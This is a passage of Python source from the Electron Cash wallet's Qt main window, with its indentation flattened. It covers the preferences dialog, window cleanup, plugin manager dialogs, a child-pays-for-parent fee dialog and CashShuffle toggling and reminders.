p = p0 or plugins.enable_internal_plugin("shuffle")
if not p:
raise RuntimeError("Could not find CashShuffle plugin")
was_enabled = p.window_has_cashshuffle(self)
if was_enabled and not p.warn_if_shuffle_disable_not_ok(self):
# user at nag screen said "no", so abort
self.update_cashshuffle_icon()
return
enable_flag = not was_enabled
self._cash_shuffle_flag = 0
KillPopupLabel("CashShuffleError")
if not p0:
# plugin was not loaded -- so flag window as wanting cashshuffle and do init
p.window_set_wants_cashshuffle(self, enable_flag)
p.init_qt(self.gui_object)
else:
# plugin was already started -- just add the window to the plugin
p.window_set_cashshuffle(self, enable_flag)
self.update_cashshuffle_icon()
self.statusBar().showMessage(self.cashshuffle_status_button.statusTip(), 3000)
if enable_flag and self.config.get("show_utxo_tab") is None:
self.toggle_tab(self.utxo_tab) # toggle utxo tab to 'on' if user never specified it should be off.
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self.top_level_window(), _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
global_tx_widgets, per_wallet_tx_widgets = [], []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electroncash.i18n import languages, get_system_language_match, match_language
language_names = []
language_keys = []
for (lang_code, lang_def) in languages.items():
language_keys.append(lang_code)
lang_name = []
lang_name.append(lang_def.name)
if lang_code == '':
# System entry in languages list (==''), gets system setting
sys_lang = get_system_language_match()
if sys_lang:
lang_name.append(f' [{languages[sys_lang].name}]')
language_names.append(''.join(lang_name))
lang_combo.addItems(language_names)
conf_lang = self.config.get("language", '')
if conf_lang:
# The below code allows us to rename languages in saved config and
# have them still line up with languages in our languages dict.
# For example we used to save English as en_UK but now it's en_US
# and it will still match
conf_lang = match_language(conf_lang)
try: index = language_keys.index(conf_lang)
except ValueError: index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]:
w.setEnabled(False)
def on_lang(x):
lang_request = language_keys[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.update_tabs()
self.update_status()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_customfee(x):
amt = customfee_e.get_amount()
m = int(amt * 1000.0) if amt is not None else None
self.config.set_key('customfee', m)
self.fee_slider.update()
self.fee_slider_mogrifier()
customfee_e = BTCSatsByteEdit()
customfee_e.setAmount(self.config.custom_fee_rate() / 1000.0 if self.config.has_custom_fee_rate() else None)
customfee_e.textChanged.connect(on_customfee)
customfee_label = HelpLabel(_('Custom Fee Rate'), _('Custom Fee Rate in Satoshis per byte'))
fee_widgets.append((customfee_label, customfee_e))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link/']) + '\n\n'\
+ _('For more information, see http://openalias.org')
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = util.base_unit_labels # ( 'BCH', 'mBCH', 'bits' )
msg = _('Base unit of your wallet.')\
+ '\n1 BCH = 1,000 mBCH = 1,000,000 bits.\n' \
              + _(' These settings affect the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
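            # Switch the base unit: capture the amounts currently entered, update the decimal
            # point, then re-set the amounts so they are redisplayed in the new unit.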
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
dp = util.base_units.get(unit_result)
if dp is not None:
self.decimal_point = dp
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_tabs()
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = web.BE_sorted_list()
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(web.BE_from_config(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
qr_combo = QComboBox()
qr_combo.addItem(_("Default"),"default")
system_cameras = []
try:
from PyQt5.QtMultimedia import QCameraInfo
system_cameras = QCameraInfo.availableCameras()
            qr_label = HelpLabel(_('Video Device') + ':', _("For scanning QR codes."))
except ImportError as e:
# Older Qt or missing libs -- disable GUI control and inform user why
qr_combo.setEnabled(False)
qr_combo.setToolTip(_("Unable to probe for cameras on this system. QtMultimedia is likely missing."))
qr_label = HelpLabel(_('Video Device') + ' ' + _('(disabled)') + ':', qr_combo.toolTip() + "\n\n" + str(e))
qr_label.setToolTip(qr_combo.toolTip())
for cam in system_cameras:
qr_combo.addItem(cam.description(), cam.deviceName())
video_device = self.config.get("video_device")
video_device_index = 0
if video_device:
video_device_index = qr_combo.findData(video_device)
qr_combo.setCurrentIndex(video_device_index)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
theme_name = self.config.get('qt_gui_color_theme', 'default')
dark_theme_available = self.gui_object.is_dark_theme_available()
if theme_name == 'dark' and not dark_theme_available:
theme_name = 'default'
index = colortheme_combo.findData(theme_name)
if index < 0: index = 0
colortheme_combo.setCurrentIndex(index)
msg = ( _("Dark theme support requires the package 'QDarkStyle' (typically installed via the 'pip3' command on Unix & macOS).")
if not dark_theme_available
else '' )
lbltxt = _('Color theme') + ':'
colortheme_label = HelpLabel(lbltxt, msg) if msg else QLabel(lbltxt)
def on_colortheme(x):
item_data = colortheme_combo.itemData(x)
if not dark_theme_available and item_data == 'dark':
self.show_error(_("Dark theme is not available. Please install QDarkStyle to access this feature."))
colortheme_combo.setCurrentIndex(0)
return
self.config.set_key('qt_gui_color_theme', item_data, True)
if theme_name != item_data:
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
if sys.platform not in ('darwin',):
# Enable/Disable HighDPI -- this option makes no sense for macOS
# and thus does not appear on that platform
hidpi_chk = QCheckBox(_('Automatic high DPI scaling'))
if sys.platform in ('linux',):
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as overly large status bar icons)"))
else: # windows
                hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as dialog box text being cut off)"))
hidpi_chk.setChecked(bool(self.config.get('qt_enable_highdpi', True)))
if self.config.get('qt_disable_highdpi'):
hidpi_chk.setToolTip(_('Automatic high DPI scaling was disabled from the command-line'))
hidpi_chk.setChecked(False)
hidpi_chk.setDisabled(True)
def on_hi_dpi_toggle():
self.config.set_key('qt_enable_highdpi', hidpi_chk.isChecked())
self.need_restart = True
hidpi_chk.stateChanged.connect(on_hi_dpi_toggle)
gui_widgets.append((hidpi_chk, None))
# CashAddr control
gui_widgets.append((None, None)) # spacer
address_w = QGroupBox(_('Address Format'))
address_w.setToolTip(_('Select between Cash Address and Legacy formats for addresses'))
hbox = QHBoxLayout(address_w)
cashaddr_cbox = QComboBox()
cashaddr_cbox.addItem(QIcon(':icons/tab_converter.svg'), _("CashAddr"), Address.FMT_CASHADDR)
cashaddr_cbox.addItem(QIcon(':icons/tab_converter_bw.svg'), _("Legacy"), Address.FMT_LEGACY)
cashaddr_cbox.setCurrentIndex(0 if self.gui_object.is_cashaddr() else 1)
def cashaddr_cbox_handler(ignored_param):
fmt = int(cashaddr_cbox.currentData())
self.gui_object.toggle_cashaddr(fmt == Address.FMT_CASHADDR)
cashaddr_cbox.currentIndexChanged.connect(cashaddr_cbox_handler)
hbox.addWidget(cashaddr_cbox)
toggle_cashaddr_control = QCheckBox(_('Hide status button'))
toggle_cashaddr_control.setToolTip(_('If checked, the status bar button for toggling address formats will be hidden'))
toggle_cashaddr_control.setChecked(self.gui_object.is_cashaddr_status_button_hidden())
toggle_cashaddr_control.toggled.connect(self.gui_object.set_cashaddr_status_button_hidden)
hbox.addWidget(toggle_cashaddr_control)
gui_widgets.append((address_w, None))
gui_widgets.append((None, None)) # spacer
updatecheck_cb = QCheckBox(_("Automatically check for updates"))
updatecheck_cb.setChecked(self.gui_object.has_auto_update_check())
updatecheck_cb.setToolTip(_("Enable this option if you wish to be notified as soon as a new version of Electron Cash becomes available"))
def on_set_updatecheck(v):
self.gui_object.set_auto_update_check(v == Qt.Checked)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
notify_tx_cb = QCheckBox(_('Notify when receiving funds'))
notify_tx_cb.setToolTip(_('If enabled, a system notification will be presented when you receive funds to this wallet.'))
notify_tx_cb.setChecked(bool(self.wallet.storage.get('gui_notify_tx', True)))
def on_notify_tx(b):
self.wallet.storage.put('gui_notify_tx', bool(b))
notify_tx_cb.stateChanged.connect(on_notify_tx)
per_wallet_tx_widgets.append((notify_tx_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
if self.force_use_single_change_addr:
usechange_cb.setChecked(True)
usechange_cb.setEnabled(False)
if isinstance(self.force_use_single_change_addr, str):
usechange_cb.setToolTip(self.force_use_single_change_addr)
else:
usechange_cb.setChecked(self.wallet.use_change)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
per_wallet_tx_widgets.append((usechange_cb, None))
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
if self.force_use_single_change_addr:
multiple_cb.setEnabled(False)
multiple_cb.setChecked(False)
if isinstance(self.force_use_single_change_addr, str):
multiple_cb.setToolTip(self.force_use_single_change_addr)
else:
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_cb.stateChanged.connect(on_multiple)
per_wallet_tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
global_tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
enable_opreturn = bool(self.config.get('enable_opreturn'))
opret_cb = QCheckBox(_('Enable OP_RETURN output'))
opret_cb.setToolTip(_('Enable posting messages with OP_RETURN.'))
opret_cb.setChecked(enable_opreturn)
opret_cb.stateChanged.connect(self.on_toggled_opreturn)
global_tx_widgets.append((opret_cb,None))
# Schnorr
use_schnorr_cb = QCheckBox(_("Enable Schnorr signatures"))
use_schnorr_cb.setChecked(self.wallet.is_schnorr_enabled())
use_schnorr_cb.stateChanged.connect(self.wallet.set_schnorr_enabled)
no_schnorr_reason = []
if self.wallet.is_schnorr_possible(no_schnorr_reason):
use_schnorr_cb.setEnabled(True)
use_schnorr_cb.setToolTip(_("Sign all transactions using Schnorr signatures."))
else:
# not possible (wallet type not supported); show reason in tooltip
use_schnorr_cb.setEnabled(False)
use_schnorr_cb.setToolTip(no_schnorr_reason[0])
per_wallet_tx_widgets.append((use_schnorr_cb, None))
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
c = self.fx.get_currency()
h = self.fx.get_history_config()
else:
c, h = self.fx.default_currency, False
exchanges = self.fx.get_exchanges_by_ccy(c, h)
conf_exchange = self.fx.config_exchange()
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
idx = ex_combo.findText(conf_exchange) # try and restore previous exchange if in new list
if idx < 0:
# hmm, previous exchange wasn't in new h= setting. Try default exchange.
idx = ex_combo.findText(self.fx.default_exchange)
idx = 0 if idx < 0 else idx # if still no success (idx < 0) -> default to the first exchange in combo
if exchanges: # don't set index if no exchanges, as any index is illegal. this shouldn't happen.
ex_combo.setCurrentIndex(idx) # note this will emit a currentIndexChanged signal if it's changed
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
changed = bool(self.fx.get_history_config()) != bool(checked)
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
if changed:
self.history_list.update() # this won't happen too often as it's rate-limited
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(gui_widgets, _('General')),
(fee_widgets, _('Fees')),
(OrderedDict([
( _("App-Global Options") , global_tx_widgets ),
( _("Per-Wallet Options") , per_wallet_tx_widgets),
]), _('Transactions')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
def add_tabs_info_to_tabs(tabs, tabs_info):
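            # Build each preferences tab: a dict maps group-box titles to widget pairs (one group
            # box per key), while a plain list becomes a single grid of widget pairs.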
def add_widget_pair(a,b,grid):
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
if a:
grid.addWidget(a, i, 0, 1, 2)
else:
grid.addItem(QSpacerItem(15, 15), i, 0, 1, 2)
for thing, name in tabs_info:
tab = QWidget()
if isinstance(thing, dict):
# This Prefs tab is laid out as groupboxes one atop another...
d = thing
vbox = QVBoxLayout(tab)
for groupName, widgets in d.items():
gbox = QGroupBox(groupName)
grid = QGridLayout(gbox)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
vbox.addWidget(gbox, len(widgets))
else:
# Standard layout.. 1 tab has just a grid of widgets
widgets = thing
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
tabs.addTab(tab, name)
# / add_tabs_info_to_tabs
add_tabs_info_to_tabs(tabs, tabs_info)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
d.setParent(None) # for Python GC
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electron Cash to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def is_alive(self): return bool(not self.cleaned_up)
def clean_up_connections(self):
def disconnect_signals():
for attr_name in dir(self):
if attr_name.endswith("_signal") and attr_name != "cashaddr_toggled_signal":
sig = getattr(self, attr_name)
if isinstance(sig, pyqtBoundSignal):
try: sig.disconnect()
except TypeError: pass # no connections
elif attr_name.endswith("__RateLimiter"): # <--- NB: this needs to match the attribute name in util.py rate_limited decorator
rl_obj = getattr(self, attr_name)
if isinstance(rl_obj, RateLimiter):
rl_obj.kill_timer()
try: self.disconnect()
except TypeError: pass
def disconnect_network_callbacks():
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
# /
disconnect_network_callbacks()
disconnect_signals()
def clean_up_children(self):
# status bar holds references to self, so clear it to help GC this window
# Note that due to quirks on macOS and the shared menu bar, we do *NOT* clear
# the menuBar. But I've found it goes away anyway on its own after window deletion.
self.setStatusBar(None)
# Reparent children to 'None' so python GC can clean them up sooner rather than later.
# This also hopefully helps accelerate this window's GC.
children = [c for c in self.children()
if (isinstance(c, (QWidget,QAction,QShortcut,TaskThread))
and not isinstance(c, (QStatusBar, QMenuBar, QFocusFrame)))]
for c in children:
try: c.disconnect()
except TypeError: pass
c.setParent(None)
def clean_up(self):
self.wallet.thread.stop()
self.wallet.thread.wait() # Join the thread to make sure it's really dead.
# We catch these errors with the understanding that there is no recovery at
# this point, given user has likely performed an action we cannot recover
# cleanly from. So we attempt to exit as cleanly as possible.
try:
self.config.set_key("is_maximized", self.isMaximized())
self.config.set_key("console-history", self.console.history[-50:], True)
except (OSError, PermissionError) as e:
self.print_error("unable to write to config (directory removed?)", e)
if not self.isMaximized():
try:
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),g.width(),g.height()])
except (OSError, PermissionError) as e:
self.print_error("unable to write to wallet storage (directory removed?)", e)
# Should be no side-effects in this function relating to file access past this point.
if self.qr_window:
self.qr_window.close()
self.qr_window = None # force GC sooner rather than later.
for d in list(self._tx_dialogs):
# clean up all extant tx dialogs we opened as they hold references
# to us that will be invalidated
d.prompt_if_unsaved = False # make sure to unconditionally close
d.close()
self._close_wallet()
try: self.gui_object.timer.timeout.disconnect(self.timer_actions)
except TypeError: pass # defensive programming: this can happen if we got an exception before the timer action was connected
self.gui_object.close_window(self) # implicitly runs the hook: on_close_window
# Now, actually STOP the wallet's synchronizer and verifiers and remove
# it from the daemon. Note that its addresses will still stay
        # 'subscribed' to the ElectrumX server until we connect to a new server
        # (due to ElectrumX protocol limitations), but this is harmless.
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
# At this point all plugins should have removed any references to this window.
# Now, just to be paranoid, do some active destruction of signal/slot connections as well as
# Removing child widgets forcefully to speed up Python's own GC of this window.
self.clean_up_connections()
self.clean_up_children()
# And finally, print when we are destroyed by C++ for debug purposes
# We must call this here as above calls disconnected all signals
# involving this widget.
destroyed_print_error(self)
def internal_plugins_dialog(self):
if self.internalpluginsdialog:
            # NB: re-entrance here is possible due to the way the window menus work on macOS, so guard against it
self.internalpluginsdialog.raise_()
return
d = WindowModalDialog(parent=self.top_level_window(), title=_('Optional Features'))
weakD = Weak.ref(d)
gui_object = self.gui_object
plugins = gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.get_internal_plugin_count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
weakGrid = Weak.ref(grid)
w.setLayout(grid)
settings_widgets = Weak.ValueDictionary()
def enable_settings_widget(p, name, i):
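            # Lazily create the plugin's settings widget in column 1 when needed; enable it only
            # while the plugin is loaded and enabled, and delete it if the plugin was unloaded.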
widget = settings_widgets.get(name)
grid = weakGrid()
d = weakD()
if d and grid and not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
if not p:
# Need to delete settings widget because keeping it around causes bugs as it points to a now-dead plugin instance
settings_widgets.pop(name)
widget.hide(); widget.setParent(None); widget.deleteLater(); widget = None
def do_toggle(weakCb, name, i):
cb = weakCb()
if cb:
p = plugins.toggle_internal_plugin(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# All plugins get this whenever one is toggled.
run_hook('init_qt', gui_object)
for i, descr in enumerate(plugins.internal_plugin_metadata.values()):
name = descr['__name__']
p = plugins.get_internal_plugin(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
weakCb = Weak.ref(cb)
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_internal_plugin_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, weakCb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.internal_plugin_metadata.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
self.internalpluginsdialog = d
d.exec_()
self.internalpluginsdialog = None # Python GC please!
def external_plugins_dialog(self):
if self.externalpluginsdialog:
            # NB: re-entrance here is possible due to the way the window menus work on macOS, so guard against it
self.externalpluginsdialog.raise_()
return
from . import external_plugins_window
d = external_plugins_window.ExternalPluginsDialog(self, _('Plugin Manager'))
self.externalpluginsdialog = d
d.exec_()
self.externalpluginsdialog = None # allow python to GC
def hardware_wallet_support(self):
if not sys.platform.startswith('linux'):
self.print_error("FIXME! hardware_wallet_support is Linux only!")
return
if self.hardwarewalletdialog:
            # NB: re-entrance here is possible due to the way the window menus work on macOS, so guard against it
self.hardwarewalletdialog.raise_()
return
from .udev_installer import InstallHardwareWalletSupportDialog
d = InstallHardwareWalletSupportDialog(self.top_level_window(), self.gui_object.plugins)
self.hardwarewalletdialog = d
d.exec_()
self.hardwarewalletdialog = None # allow python to GC
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self.top_level_window(), _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
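            # Fee-slider callback: recompute the fee from the rate and the combined
            # parent+child size, capped at the available input amount.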
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
result = d.exec_()
d.setParent(None) # So Python can GC
if not result:
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
if new_tx is None:
self.show_error(_('CPFP no longer valid'))
return
self.show_transaction(new_tx)
def is_wallet_cashshuffle_compatible(self):
from electroncash.wallet import ImportedWalletBase, Multisig_Wallet
if (self.wallet.is_watching_only()
or self.wallet.is_hardware()
or isinstance(self.wallet, (Multisig_Wallet, ImportedWalletBase))):
# wallet is watching-only, multisig, or hardware so.. not compatible
return False
return True
_cs_reminder_pixmap = None
def do_cash_shuffle_reminder(self):
if not self.remind_cashshuffle_enabled:
# NB: This is now disabled. We return early from this function.
# Amaury recommended we do this prompting/reminder in a future
# release after the initial public release, or we roll it out
# for a subset of users (hence this flag).
return
if self.cleaned_up or not self.wallet or not self.is_wallet_cashshuffle_compatible():
return
from electroncash_plugins.shuffle.conf_keys import ConfKeys
p = self.cashshuffle_plugin_if_loaded()
storage = self.wallet.storage
cashshuffle_flag = storage.get(ConfKeys.PerWallet.ENABLED, False)
enabled = cashshuffle_flag and p and p.is_enabled()
nagger_answer = storage.get(ConfKeys.PerWallet.MAIN_WINDOW_NAGGER_ANSWER, None)
if not enabled:
if nagger_answer is None: # nagger_answer is None if they've never said "Never ask"
if __class__._cs_reminder_pixmap is None:
# lazy init. Cache it to class level.
size = QSize(150, int(150/1.4419)) # Important to preserve aspect ratio in .svg file here
# NB: doing it this way, with a QIcon, will take into account devicePixelRatio and end up possibly producing a very hi quality image from the SVG, larger than size
__class__._cs_reminder_pixmap = QIcon(":icons/CashShuffleLogos/logo-vertical.svg").pixmap(size)
icon = __class__._cs_reminder_pixmap
message = '''
<big>{}</big></b>
<p>{}</p>
'''.format(_("CashShuffle is disabled for this wallet.") if not cashshuffle_flag else _("CashShuffle is disabled."),
_("Would you like to enable CashShuffle for this wallet?"))
